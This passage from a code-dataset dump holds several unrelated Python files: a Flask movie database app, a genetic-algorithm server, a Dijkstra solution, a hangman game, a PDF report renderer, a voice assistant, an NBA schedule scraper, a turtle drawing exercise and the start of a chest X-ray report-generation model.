      for consistent markup.\n rendered_toc = self.render_partial(toctree.parent)['body']\n\n return Envelope(docname=TOC_DOCNAME,\n body=rendered_toc,\n title=None,\n toc=None,\n builder=self,\n deconst_config=self.deconst_config,\n per_page_meta={'deconstunsearchable': True},\n docwriter=self._publisher.writer)\n","repo_name":"deconst/preparer-sphinx","sub_path":"deconstrst/builders/serial.py","file_name":"serial.py","file_ext":"py","file_size_in_byte":6199,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"35555079147","text":"#__author__ == \"Priyanka Shanmugasundaram (pshanmu)\"\r\n# note: most of this code is modified from lecture\r\nimport os\r\nfrom flask import Flask, render_template, session, redirect, url_for, request# tools that will make it easier to build on things\r\nfrom flask_sqlalchemy import SQLAlchemy # handles database stuff for us - need to pip install flask_sqlalchemy in your virtual env, environment, etc to use this and run this\r\nimport seaborn as sns\r\nfrom flask_wtf import Form\r\nfrom wtforms import StringField, DecimalField, SubmitField, FloatField\r\nfrom wtforms.validators import InputRequired\r\nfrom wtforms_alchemy import ModelForm\r\nimport requests\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport io\r\nimport base64\r\n\r\n# Application configurations\r\napp = Flask(__name__)\r\napp.debug = True\r\napp.use_reloader = True\r\napp.config['SECRET_KEY'] = '05201996'\r\n\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///./movies.db' # TODO: decide what your new database name will be -- that has to go here\r\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\n\r\n\r\n# Set up Flask debug stuff\r\ndb = SQLAlchemy(app) # For database use\r\nsession = db.session # to make queries easy\r\n\r\n\r\n\r\n#########\r\n######### Everything above this line is important/useful setup, not problem-solving.\r\n#########\r\n\r\n\r\n##### Set up Models #####\r\n\r\n# Set up association Table if you wanted many to many relationship:\r\ncollections = db.Table('collections',db.Column('genre_id',db.Integer, db.ForeignKey('genres.id')),db.Column('director_id',db.Integer, db.ForeignKey('directors.id')))\r\n\r\nclass Genre(db.Model):\r\n __tablename__ = \"genres\"\r\n id = db.Column(db.Integer, primary_key=True)\r\n name = db.Column(db.String(64))\r\n directors = db.relationship('Director',secondary=collections,backref=db.backref('genres',lazy='dynamic'),lazy='dynamic')\r\n #directors = db.relationship('Director', backref = 'Genre')\r\n movies = db.relationship('Movie',backref='Genre')\r\n\r\n\r\nclass Director(db.Model):\r\n __tablename__ = \"directors\"\r\n id = db.Column(db.Integer, primary_key=True)\r\n name = db.Column(db.String(64))\r\n movies = db.relationship('Movie',backref='Director')\r\n\r\n def __repr__(self):\r\n return \"{} (ID: {})\".format(self.name,self.id)\r\n\r\n\r\nclass Movie(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n title = db.Column(db.String(64)) # unique=True, Only unique title songs can exist in this data model\r\n genre = db.Column(db.Integer, db.ForeignKey(\"genres.id\")) #ok to be null for now\r\n director_id = db.Column(db.Integer, db.ForeignKey(\"directors.id\")) # ok to be null for now\r\n #genre = db.Column(db.String(64)) # ok to be null\r\n imdb_rating = db.Column(db.Float)\r\n\r\n\r\n def __repr__(self):\r\n return \"{} by {} | {}\".format(self.title,self.director_id, self.genre)\r\n\r\n##### Form for Final Project####\r\n\r\nclass UpdateForm(Form):\r\n title = StringField('title', validators = [InputRequired()])\r\n director = StringField('director', validators = [InputRequired()])\r\n genre = StringField('genre', validators = [InputRequired()])\r\n imdb_rating = FloatField('imdb_rating', validators = [InputRequired()])\r\n submit = SubmitField('Submit')\r\n\r\n##### Helper functions #####\r\n\r\n### For database additions\r\n### Relying on global session variable above existing\r\n\r\ndef get_or_create_director(director_name):\r\n director = Director.query.filter_by(name=director_name).first()\r\n if director:\r\n return director\r\n else:\r\n director = Director(name=director_name)\r\n session.add(director)\r\n session.commit()\r\n return director\r\n\r\n\r\n##### Set up Controllers (route functions) #####\r\n\r\n## Main route\r\n@app.route('/') #MODIFED ROUTE 1 FOR FINAL PROJECT\r\ndef index():\r\n movies = Movie.query.all()\r\n num_movies = len(movies)\r\n return render_template('index.html', num_movies=num_movies)\r\n\r\n@app.route('/movie/new//<genre>/<director>/<rating>') ## CHANGE FOR FINAL PROJECT (NEW ROUTE 1)\r\ndef new_movie(title, director, genre, rating):\r\n if Movie.query.filter_by(title=title).first(): # if there is a song by that title\r\n return \"That movie already exists! Go back to the main app!\"\r\n else:\r\n director = get_or_create_director(director)\r\n movie = Movie(title=title, director_id=director.id,genre=genre, imdb_rating = rating)\r\n session.add(movie)\r\n session.commit()\r\n return \"New movie: {} by {}. Check out the URL for ALL movies to see the whole list.\".format(movie.title, director.name)\r\n\r\n@app.route('/all_movies')\r\ndef all_movies():\r\n all_movies = [] # Will be be tuple list of title, genre\r\n movies = Movie.query.all()\r\n for m in movies:\r\n director = Director.query.filter_by(id=m.director_id).first() # get just one artist instance\r\n all_movies.append((m.title,director.name, m.genre)) # get list of songs with info to easily access [not the only way to do this]\r\n return render_template('all_movies.html',all_movies=all_movies) # check out template to see what it's doing with what we're sending!\r\n\r\n@app.route('/all_directors')\r\ndef all_directors():\r\n directors = Director.query.all()\r\n names = []\r\n for d in directors:\r\n num_movies = len(Movie.query.filter_by(director_id=d.id).all())\r\n newtup = (d.name,num_movies)\r\n names.append(newtup) # names will be a list of tuples\r\n return render_template('all_directors.html',director_names=names)\r\n\r\n@app.route('/movie/new', methods=['POST', 'GET']) ## NEW ROUTE 2 FOR FINAL PROJECT\r\ndef new_movie_form(): #source: https://stackoverflow.com/questions/27367233/how-can-print-input-from-flask-wtform-to-html-with-sqlalchemy\r\n form = UpdateForm(request.form)\r\n movie = Movie()\r\n #form.populate_obj(movie)\r\n #director = get_or_create_director(director)\r\n #movie = Movie(title=title, director_id=director.id,genre=genre, imdb_rating = imdb_rating)\r\n #session.add(movie)\r\n #session.commit()\r\n director = get_or_create_director(form.director.data)\r\n movie.title = form.title.data\r\n movie.director_id = director.id\r\n movie.genre = form.genre.data\r\n movie.imdb_rating = form.imdb_rating.data\r\n session.add(movie)\r\n session.commit()\r\n return render_template('form.html', form=form)\r\n\r\n@app.route('/top_movies') ## NEW ROUTE 3 FOR FINAL PROJECT\r\ndef see_top_movies():\r\n top_movies = []\r\n movies = Movie.query.all()\r\n for m in movies:\r\n director = Director.query.filter_by(id=m.director_id).first()\r\n imdb = float(m.imdb_rating)\r\n if imdb >= 8.0:\r\n top_movies.append((m.title, director.name, m.imdb_rating, m.genre))\r\n return render_template('all_movies.html', all_movies = top_movies)\r\n\r\n@app.route('/ratings/visualized')\r\ndef see_ratings():\r\n movie_ratings = []\r\n movies = Movie.query.all()\r\n for m in movies:\r\n movie_ratings.append(m.imdb_rating)\r\n img = io.BytesIO()\r\n sns.set_palette('colorblind')\r\n plt.hist(movie_ratings)\r\n plt.xlabel('Ratings')\r\n plt.title('Distribution of Ratings Among Movies in this Database')\r\n plt.savefig(img, format = 'png')\r\n img.seek(0)\r\n plot_url = base64.b64encode(img.getvalue()).decode()\r\n\r\n return '<img src=\"data:image/png;base64,{}\">'.format(plot_url)\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n db.create_all() # This will create database in current directory, as set up, if it doesn't exist, but won't overwrite if you restart - so no worries about that\r\n app.run() # run with this: python main_app.py runserver\r\n","repo_name":"prishanmu/Movies_FlaskApp","sub_path":"SI507project_tools.py","file_name":"SI507project_tools.py","file_ext":"py","file_size_in_byte":7589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34730427366","text":"#\n# Binds REP socket to tcp://*:5555\n#\n\nimport time\nimport zmq\nimport sys\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport argparse\nimport json\nimport re\nfrom geneticalgorithm_mod import geneticalgorithm as ga\nimport morphologies\nfrom utils import thruster_keys_to_string\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-v', '--verbose', action='store_true', default = False,\n dest='simple_value', help='Print information when receiving data')\n\nresult = parser.parse_args()\n\ndef pairServer(train,loadfile='morph_data.json'):\n context = zmq.Context()\n global socket\n socket = context.socket(zmq.PAIR)\n socket.bind(\"tcp://*:5555\")\n print(\"python server started\")\n global Morphologies\n Morphologies = morphologies.Morphologies(train=True,nepoch=0)\n\n algorithm_param = {'max_num_iteration': 16000,\\\n 'population_size':20,\\\n 'mutation_probability':0.1,\\\n 'elit_ratio': 0.01,\\\n 'crossover_probability': 0.5,\\\n 'parents_portion': 0.3,\\\n 'crossover_type':'uniform',\\\n 'max_iteration_without_improv':None}\n\n varbound = np.array([[-1,1]]*1608)\n vartype = np.array(np.concatenate([np.array([['int']]*8),np.array([['real']]*1600)]))\n model=ga(function=ga_f,dimension=1608,variable_type_mixed=vartype,variable_boundaries=varbound,algorithm_parameters=algorithm_param,function_timeout=600)\n model.run()\n smsg = \"End\"\n socket.send(smsg.encode('utf-8'))\n Morphologies.save_to_file()\n\n\ndef ga_f(X):\n pop_s = len(X)\n #smsg = np.array2string(X,max_line_width=np.inf,threshold =2000)\n smsg = thruster_keys_to_string(X)\n socket.send(smsg.encode('utf-8'))\n objs = np.zeros(pop_s)\n for i in range(pop_s):\n rmsg = socket.recv().decode()\n key, mean, episode = handleMessage(rmsg)\n print(\"Episode %d Key %s with Val = %f\"%(episode, str(key), mean))\n for data in Morphologies.morph_data:\n if data[\"morph\"] == key:\n data[\"val_means\"].append(mean)\n data[\"episodes\"].append(episode)\n objs[i] = -mean\n return objs\n\ndef handleMessage(message):\n parts = message.split(',')\n morph = parts[0]\n mean = float(parts[1])\n episode = int(parts[2])\n key = [int(val) for val in re.findall(r'-?\\d+', morph)]\n return key, mean, episode\n\ndef main():\n start = time.time()\n pairServer(train=False,loadfile='old_morph_datas/morph_data_pen-11.json')\n end = time.time()\n print(\"%f seconds\"%(end-start))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jdc5549/DesignControl","sub_path":"server_ga.py","file_name":"server_ga.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71894169443","text":"# 출처: 프로그래머스 코딩 테스트 연습, https://programmers.co.kr/learn/challenges\n# 기존 다익스트라 변형\n# 1. 출발 / 도착점 구분 X\n# 2. 중복 되는 경우 O\n\nimport sys\n\n\ndef dijkstra(K, V, graph):\n INF = sys.maxsize\n s = [False] * V\n d = [INF] * V\n d[K - 1] = 0\n while True:\n m = INF\n N = -1\n for j in range(V):\n if not s[j] and m > d[j]:\n m = d[j]\n N = j\n if m == INF:\n break\n s[N] = True\n for j in range(V):\n if s[j]:\n continue\n via = d[N] + min(graph[N][j], graph[j][N]) # 출발 / 도착 구분 없음\n if d[j] > via:\n d[j] = via\n return d\n\n\ndef solution(N, road, K):\n INF = sys.maxsize\n graph = [[INF] * N for _ in range(N)]\n for r in road:\n graph[r[0] - 1][r[1] - 1] = min(r[2], graph[r[0] - 1][r[1] - 1]) # 중복되는 길 있을 수 있음\n answer = 0\n for d in dijkstra(1, N, graph):\n if d <= K:\n answer += 1\n return answer\n\n# 기존 다익스트라\n# import sys\n\n\n# def dijkstra(K, V, graph):\n# INF = sys.maxsize\n# s = [False] * V\n# d = [INF] * V\n# d[K - 1] = 0\n# while True:\n# m = INF\n# N = -1\n# for j in range(V):\n# if not s[j] and m > d[j]:\n# m = d[j]\n# N = j\n# if m == INF:\n# break\n# s[N] = True\n# for j in range(V):\n# if s[j]: continue\n# via = d[N] + graph[N][j] # <- 단방향 | 양방향 -> min(graph[N][j],graph[j][N])\n# if d[j] > via:\n# d[j] = via\n# return d\n\n# if __name__ == \"__main__\":\n# V, E = map(int, input().split())\n# K = int(input())\n# INF = sys.maxsize\n# graph = [[INF]*V for _ in range(V)]\n\n# for _ in range(E):\n# u, v, w = map(int, input().split())\n# graph[u-1][v-1] = w # 중복 O -> graph[u-1][v-1]=min(graph[u-1][v-1],w)\n\n# for d in dijkstra(K, V, graph):\n# print(d if d != INF else \"INF\")","repo_name":"kseungwoo/problem-solving","sub_path":"Programmers/Dijkstra/배달.py","file_name":"배달.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"45244087802","text":"def jogar(): \r\n print(\"*************************************\")\r\n print(\"Bem vindo ao jogo!\")\r\n print(\"*************************************\")\r\n \r\n palavra_chave = \"banana\"\r\n \r\n enforcou = False\r\n acertou = False\r\n \r\n while (not enforcou and not acertou):\r\n chute = input(\"Qual a letra?\")\r\n index = 0\r\n for letra in palavra_chave:\r\n if chute == letra: \r\n print(\"Encontrei a letra {} na posição {}\".format(letra, index))\r\n index = index + 1\r\n print(\"Jogando...\")\r\n \r\n print(\"Fim do jogo\")\r\nif (__name__ == \"__main__\"):\r\n jogar()\r\n","repo_name":"diogopsa/Cursos_Alura","sub_path":"forca.py","file_name":"forca.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18928006165","text":"import jinja2\nimport pandas as pd\nimport progressbar\nfrom PIL import Image as PILImage\nfrom os.path import basename, dirname, isfile\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.pdfgen import canvas\nfrom reportlab.platypus import Image, Paragraph\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.lib.fonts import addMapping\nfrom xml.etree import ElementTree\n\n\ndef year(num):\n if num is not None:\n return \"{:}\".format(round(num))\n return \"NA\"\n\n\ndef people(num):\n if num is not None:\n return \"{:,}\".format(round(num))\n return \"NA\"\n\ndef dollar(num):\n if num is not None:\n return \"${0:,.2f}\".format(float(num))\n return \"NA\"\n\ndef roundDollar(num):\n if num is not None:\n return \"${0:,}\".format(round(num))\n return \"NA\"\n\ndef percent(num):\n if num is not None:\n return \"{}%\".format(round(num))\n return \"NA\"\n\ndef roundInt(num):\n if num is not None:\n return round(float(num))\n return \"NA\"\n\n\n########################################################################\nclass ReportMaker(object):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, countries, template_folder, pdf_file):\n pdfmetrics.registerFont(TTFont('Geomanist', 'fonts/Geomanist-Regular.ttf'))\n pdfmetrics.registerFont(TTFont('Geomanist-Bold', 'fonts/Geomanist-Bold.ttf'))\n pdfmetrics.registerFont(TTFont('Geomanist-Italic', 'fonts/Geomanist-RegularItalic.ttf'))\n addMapping('Geomanist',0,0,'Geomanist')\n addMapping('Geomanist',0,1,'Geomanist-Italic')\n addMapping('Geomanist',1,0,'Geomanist-Bold')\n\n self.styles = getSampleStyleSheet()\n self.template_folder = template_folder\n templateLoader = jinja2.FileSystemLoader(searchpath=\"./{}/\".format(self.template_folder))\n templateEnv = jinja2.Environment(loader=templateLoader)\n templateEnv.filters['people'] = people\n templateEnv.filters['dollar'] = dollar\n templateEnv.filters['roundDollar'] = roundDollar\n templateEnv.filters['percent'] = percent\n templateEnv.filters['year'] = year\n templateEnv.filters['roundInt'] = roundInt\n TEMPLATE_FILE = \"template.xml.j2\"\n template = templateEnv.get_template(TEMPLATE_FILE)\n\n output = template.render(countries=countries)\n xml_file = \"./render/template.xml\"\n with open(xml_file, \"w\") as outfile:\n outfile.write(output)\n\n self.e = ElementTree.parse(xml_file).getroot()\n self.width, self.height = int(self.e.getchildren()[0].get(\"width\")), int(self.e.getchildren()[0].get(\"height\"))\n self.c = canvas.Canvas(pdf_file, pagesize=(self.width,self.height),pageCompression=1)\n self.fonts = {}\n for page in self.e.findall(\"page\"):\n for fontspec in page.findall(\"fontspec\"):\n font = {}\n font[\"size\"] = int(fontspec.get(\"size\"))\n font[\"color\"] = fontspec.get(\"color\")\n font[\"background\"] = fontspec.get(\"background\")\n if fontspec.get(\"indent\") is not None:\n font[\"indent\"] = fontspec.get(\"indent\")\n else:\n font[\"indent\"] = \"0\"\n if fontspec.get(\"padding\") is not None:\n font[\"padding\"] = fontspec.get(\"padding\")\n else:\n font[\"padding\"] = \"0\"\n self.fonts[fontspec.get(\"id\")] = font\n\n #----------------------------------------------------------------------\n def createDocument(self):\n \"\"\"\"\"\"\n for page in progressbar.progressbar(self.e.findall(\"page\")):\n self.width, self.height = int(page.get(\"width\")), int(page.get(\"height\"))\n self.c.setPageSize((self.width,self.height))\n for image in page.findall(\"image\"):\n src = self.template_folder+\"/\"+image.get(\"src\")\n if \"charts\" in src:\n chart_name = basename(src)\n chart_path = dirname(src)\n dest = chart_path+\"/reduced_\"+chart_name\n if not isfile(dest):\n pilImg = PILImage.open(src)\n size = (pilImg.size[0]/1.5,pilImg.size[1]/1.5)\n pilImg.thumbnail(size,PILImage.NEAREST)\n pilImg.save(dest,optimize=True)\n else:\n dest = src\n logo = Image(dest)\n logo.drawHeight = int(image.get(\"height\"))\n logo.drawWidth = int(image.get(\"width\"))\n logo.wrapOn(self.c, self.width, self.height)\n logo.drawOn(self.c, *self.coord(int(image.get(\"left\")),int(image.get(\"top\"))+int(image.get(\"height\")) ))\n for text in page.findall(\"text\"):\n if len(text.getchildren())==0:\n font = self.fonts[text.get(\"font\")]\n replacement = text.text\n\n if text.get(\"shrink\"):\n textLen = float(len(replacement))\n fontSizeAdj = int(font[\"size\"])\n heightAdj = int(text.get(\"height\"))*2 if textLen > 30 else int(text.get(\"height\"))\n width = int(text.get(\"width\"))\n else:\n fontSizeAdj = int(font[\"size\"])\n heightAdj = int(text.get(\"height\"))\n width = self.width\n\n style = ParagraphStyle(\n 'default',\n fontName=\"Geomanist\",\n leading=fontSizeAdj,\n fontSize=fontSizeAdj,\n borderPadding = int(font[\"padding\"]),\n textColor=font[\"color\"],\n backColor=font[\"background\"],\n firstLineIndent=int(font[\"indent\"]),\n )\n\n self.createParagraph(replacement, int(text.get(\"left\")), (int(text.get(\"top\"))+heightAdj), width,style)\n else:\n innerText = ElementTree.tostring(text.getchildren()[0])\n font = self.fonts[text.get(\"font\")]\n replacement = innerText\n\n if text.get(\"shrink\"):\n textLen = float(len(replacement))\n fontSizeAdj = int(font[\"size\"])\n heightAdj = int(text.get(\"height\"))*2 if textLen > 30 else int(text.get(\"height\"))\n width = int(text.get(\"width\"))\n else:\n fontSizeAdj = int(font[\"size\"])\n heightAdj = int(text.get(\"height\"))\n width = self.width\n\n style = ParagraphStyle(\n 'default',\n fontName=\"Geomanist\",\n leading=fontSizeAdj,\n fontSize=fontSizeAdj,\n borderPadding = int(font[\"padding\"]),\n textColor=font[\"color\"],\n backColor=font[\"background\"],\n firstLineIndent=int(font[\"indent\"]),\n )\n\n self.createParagraph(replacement, int(text.get(\"left\")), (int(text.get(\"top\"))+heightAdj), width, style)\n for line in page.findall(\"line\"):\n self.c.setDash(int(line.get(\"on\")),int(line.get(\"off\")))\n self.c.setStrokeColor(line.get(\"color\"))\n self.c.line(int(line.get(\"x1\")),self.height-int(line.get(\"y1\")),int(line.get(\"x2\")),self.height-int(line.get(\"y2\")))\n for button in page.findall(\"button\"):\n padtop = int(button.get(\"pt\")) if button.get(\"pt\") else 0\n padbottom = int(button.get(\"pb\")) if button.get(\"pb\") else 0\n padleft = int(button.get(\"pl\")) if button.get(\"pl\") else 0\n padright = int(button.get(\"pr\")) if button.get(\"pr\") else 0\n top = (self.height - int(button.get(\"top\")))+padtop\n bottom = ((top-padtop) - int(button.get(\"height\")))-padbottom\n left = int(button.get(\"left\"))-padleft\n right = ((left+padleft) + int(button.get(\"width\")))+padright\n rect = (left, bottom, right, top)\n self.c.linkAbsolute(\"\", button.get(\"href\"), rect, Border='[0 0 0]')\n for bookmark in page.findall(\"bookmark\"):\n self.c.bookmarkPage(bookmark.get(\"name\"),fit=\"FitR\",left=1,right=self.width, bottom=self.height-self.width, top=self.height)\n\n self.c.showPage()\n\n #----------------------------------------------------------------------\n def coord(self, x, y, unit=1):\n \"\"\"\n # http://stackoverflow.com/questions/4726011/wrap-text-in-a-table-reportlab\n Helper class to help position flowables in Canvas objects\n \"\"\"\n x, y = x * unit, self.height - y * unit\n return x, y\n\n #----------------------------------------------------------------------\n def createParagraph(self, ptext, x, y, width, style=None):\n \"\"\"\"\"\"\n if not style:\n style = self.styles[\"Normal\"]\n p = Paragraph(ptext, style=style)\n p.wrapOn(self.c, width, self.height)\n p.drawOn(self.c, *self.coord(x, y))\n\n #----------------------------------------------------------------------\n def savePDF(self):\n \"\"\"\"\"\"\n self.c.save()\n\n#----------------------------------------------------------------------\nif __name__ == \"__main__\":\n csv_file = \"./data/countries_merged.csv\"\n countries_df = pd.read_csv(csv_file, keep_default_na=False, na_values=[\"\"])\n countries_df = countries_df.where(countries_df.notnull(), None)\n countries = countries_df.to_dict('records')\n doc = ReportMaker(countries, \"./final_template\", \"./render/p20_profiles.pdf\")\n doc.createDocument()\n doc.savePDF()\n","repo_name":"akmiller01/p20-profiles-2020","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":10053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71608316643","text":"import speech_recognition as sr\r\nimport pyttsx3\r\nimport datetime\r\nimport pywhatkit\r\nimport wikipedia\r\nimport pyjokes\r\nlistener = sr.Recognizer()\r\ncortana = pyttsx3.init()\r\n# voices = cortana.getProperty('voices')\r\n# cortana.setProperty('voice', voices[1].id)\r\n\r\ndef talk(text):\r\n cortana.say(text)\r\n cortana.runAndWait()\r\n\r\ndef take_command():\r\n try:\r\n with sr.Microphone() as source:\r\n print('Listening...')\r\n voice = listener.listen(source)\r\n command = listener.recognize_google(voice)\r\n command = command.lower()\r\n print(command)\r\n if 'cortana' in command:\r\n command = command.replace('cortana', ' ')\r\n #print(command)\r\n\r\n except:\r\n pass\r\n return command\r\n\r\ndef run_cortana():\r\n command = take_command()\r\n# Knowing_time\r\n if 'time' in command:\r\n time = datetime.datetime.now().strftime('%I:%M %p')\r\n print(time)\r\n talk('Current time is ' + time)\r\n# play_song_on_youtube\r\n elif 'play' in command:\r\n song = command.replace('play', '')\r\n talk('playing' + song)\r\n pywhatkit.playonyt(song)\r\n#tell_me_about_info_from_wikipedia\r\n elif 'tell me about' in command:\r\n look_for = command.replace('tell me about', ' ')\r\n info = wikipedia.summary(look_for, 1)\r\n print(info)\r\n talk(info)\r\n#tell_me_joke\r\n elif 'joke' in command:\r\n jokes = pyjokes.get_joke()\r\n print(jokes)\r\n talk(jokes)\r\n#when_did_not_understand\r\n else:\r\n talk('Sorry, I can not hear you but i can search it for you')\r\n pywhatkit.search(command)\r\n\r\nwhile True:\r\n run_cortana()","repo_name":"Dilshad-Jahan73/virtual-assistant-robot","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22137165468","text":"import requests\nfrom datetime import datetime, timedelta\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom google.cloud import storage\nimport os\n\n\ndef get_games(startDate,endDate):\n ##########################################################################\n # Get Distinct Months for schedule to scrape\n ##########################################################################\n\n delta = endDate - startDate\n \n yearmonths = []\n for i in range(delta.days + 1):\n r = {}\n day = startDate + timedelta(days=i)\n r['monthname'] = day.strftime('%B').lower()\n if day.month > 9:\n r['year'] = day.year + 1\n else:\n r['year'] = day.year\n if r not in yearmonths: \n yearmonths.append(r)\n\n schedule = []\n for v in yearmonths:\n year = str(v['year'])\n month = v['monthname']\n url = 'https://www.basketball-reference.com/leagues/NBA_' + year + '_games-' + month + '.html'\n #print(url)\n\n html = requests.get(url)\n\n if html.ok:\n soup = BeautifulSoup(html.content, 'html.parser') \n else:\n print(f'No data for {month} {year} because enountered error code {html.status_code}')\n continue\n\n rows = soup.find('table', id=\"schedule\").find('tbody').find_all('tr')\n\n for row in rows:\n game_date_node = row.find('th',{\"data-stat\": \"date_game\"})\n if game_date_node is not None:\n\n game_date = datetime.strptime(game_date_node.text, '%a, %b %d, %Y').date()\n if game_date >= startDate and game_date <= endDate:\n \n r = {}\n \n\n v1 = row.find('th',{\"data-stat\": \"date_game\"})\n \n r['game_date'] = datetime.strptime(v1.text, '%a, %b %d, %Y').strftime(\"%Y-%m-%d\")\n r['game_day'] = datetime.strptime(v1.text, '%a, %b %d, %Y').strftime(\"%A\")\n\n v2 = row.find('td',{\"data-stat\": \"game_start_time\"})\n r['game_start_time'] = v2.text if v2 else None\n\n v3 = row.find('td',{\"data-stat\": \"visitor_team_name\"})\n r['visitor_team_name'] = v3.text\n r['away_abbr'] = v3['csk'].split('.')[0]\n\n v4 = row.find('td',{\"data-stat\": \"home_team_name\"})\n r['home_team_name'] = v4.text\n r['home_abbr'] = v4['csk'].split('.')[0]\n\n if r['game_start_time']:\n v12 = r['away_abbr'] + r['game_date'].replace('-','') + r['home_abbr'] + r['game_start_time'].replace(':','')\n else:\n v12 = r['away_abbr'] + r['game_date'].replace('-','') + r['home_abbr']\n r['game_key'] = v12 if v12 else None\n\n schedule.append(r)\n \n return schedule\n\ndef write_to_bucket(request):\n \n # Use schedule days if in request, otherwise default to 2 weeks (14 days)\n try:\n if type(request) == 'dict':\n request_json = request\n else:\n request_json = request.get_json() \n if request_json and 'ScheduleDays' in request_json:\n schedule_days = request_json['ScheduleDays']\n else:\n schedule_days = 14\n except Exception as e:\n raise ValueError(\"Invalid input. Please provide ScheduleDays as an integer\") from e\n \n # Calculate begin/end dates based on schedule days\n startDate = (datetime.now()).date()\n endDate = (startDate + timedelta(days=schedule_days))\n schedule = get_games(startDate,endDate) \n \n # Upload schedule to default app engine storage bucket\n game_date = pd.DataFrame(schedule)\n client = storage.Client()\n bucket_name = os.environ.get(\"CLOUD_STORAGE_BUCKET\")\n bucket = client.bucket(bucket_name)\n bucket.blob('static/upcoming.json').upload_from_string(game_date.to_json(), 'text/json')\n\n return f'Successfully updated bucket with upcoming games for the next {schedule_days} days'\n","repo_name":"cwilbar04/gcp-end-to-end-nba-predictions","sub_path":"get_schedule/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8871376542","text":"#Ex.2\nimport turtle\n#Funcao recebe parametros turtle t, n lados, de lado sz\ndef draw_poly(t, n, sz):\n \"\"\"Faz turtle t desenhar poligono regular de sz.\"\"\"\n a = 360/n\n for i in range(n):\n t.forward(sz)\n t.left(a)\n\n\n#Cria turtle tess\ntess = turtle.Turtle()\n#cor da caneta rosa\ntess.pencolor(\"lightpink\")\n#tamanho da caneta\ntess.pensize(3)\n#Configura a janela e seus atributos\nwn = turtle.Screen()\nwn.bgcolor(\"lightgreen\")\nwn.title(\"tess meets a function\")\n#Teste que chama a funcao para desenhar poligono regular\ndraw_poly(tess, 8, 50)\nwn.mainloop()\n#############################################################","repo_name":"wrgyotoku/CES-22","sub_path":"LISTA1/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9926703958","text":"import torch\nimport torch.nn as nn\nimport torchvision.models as models\nfrom transformers import (\n BlipForConditionalGeneration,\n Trainer, \n TrainingArguments,\n DataCollatorForLanguageModeling\n) \n\nfrom config import *\nimport paths \n\nclass ScanVisualFeatures(nn.Module):\n def __init__(self):\n super(ScanVisualFeatures, self).__init__()\n self.model, self.features, self.avg_pool = self.get_model()\n\n def get_model(self):\n '''\n Model for extracting visual features from chest x-ray image\n\n Returns:\n model(nn.Sequential): visual feature extractor model\n features(int): Number of features to fully connecte dlayer in densenet201\n avg_pool(nn.AvgPool2d): Average pooling layer \n '''\n # Extract convolutional layers from densenet121\n densenet = models.densenet121(weights='DEFAULT')\n layers = list(densenet.features)\n # Extract number of input features to FC layer in densenet\n features = densenet.classifier.in_features\n\n # Create a sequential model with the extracted convolutional layers\n model = nn.Sequential(*layers)\n # Apply average pooling\n avg_pool = torch.nn.AvgPool2d(kernel_size=7, stride=1, padding=0)\n\n return model, features, avg_pool\n\n def forward(self, image):\n '''\n Forward pass through densenet121 for extracting visual features\n\n Args:\n image(tensor): a tensor of chest x-ray image\n\n Returns:\n out_features(torch.Tensor): average pooled features of the image\n '''\n # Get features from last convolutional layer\n features = self.model(image)\n # Apply average pooling\n out_features = self.avg_pool(features).squeeze()\n\n return out_features\n\n\nclass TagsClassifier(nn.Module):\n def __init__(self, classes, in_features_dim):\n '''\n Single layer linear classifier for tags classification\n\n Args:\n classes(int): Number of output classes\n in_features_dim(int): Number of input features to classification layer\n '''\n super(TagsClassifier, self).__init__()\n self.classifier = nn.Linear(in_features=in_features_dim, out_features=classes)\n self.activation = nn.Softmax()\n self.init_weight()\n\n def init_weight(self):\n # Initialize weights of linear layer in classification model\n self.classifier.weight.data.uniform_()\n self.classifier.bias.data.fill_(0)\n\n def forward(self, avg_features):\n '''\n Forward pass through classificaiton model\n\n Args:\n avg_features(troch.Tensor): a tensor of average pooled features of image\n\n Returns:\n predicted_tags_prob(torch.Tensor): A tensor representing the probabilities of the classes for given input image features\n '''\n pred_prob = self.activation(self.classifier(avg_features))\n return pred_prob\n\n\nclass ReportGeneration():\n def __init__(self):\n # Initialize conditional generation model for report generation\n self.model = BlipForConditionalGeneration.from_pretrained('nathansutton/generate-cxr')\n\n def finetuning(self, report_tokenizer, report_processor, train, valid):\n '''\n Fine tune model on our chest x-ray dataset\n\n Args:\n report_tokenizer(blip tokenizer): tokenizer of blipprocessor\n report_processor(blip processor): blip processor\n train(torch.Dataset): training dataset\n valid(torch.Dataset): validation 